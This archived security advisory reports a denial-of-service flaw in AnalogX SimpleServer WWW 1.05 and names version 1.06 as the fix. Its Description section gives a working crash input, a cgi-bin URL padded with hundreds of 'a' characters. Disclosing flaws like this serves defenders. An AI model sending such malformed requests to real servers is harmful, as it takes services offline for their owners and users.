TUCoPS :: Web :: Servers :: analog3.htm

AnalogX SimpleServer WWW Version 1.05 malformed URL attack 
Vulnerability

    AnalogX

Affected

    AnalogX SimpleServer WWW Version 1.05

Description

    The Ussr  Labs team  has discovered  a null  memory problem in the
    SimpleServer WWW Version 1.05.   What happens is by preforming  an
    attack with a malformed url  information to port 80 it  will cause
    the proccess containg  the services to  stop responding.   Example
    follows.

    Type in you browser one malformed url like this:

        http://serverip/cgi-bin/aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa

    and the process containg the service crash.

Solution

    You can download the version 1.06 here:

        http://www.analogx.com/files/sswwwi.exe

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH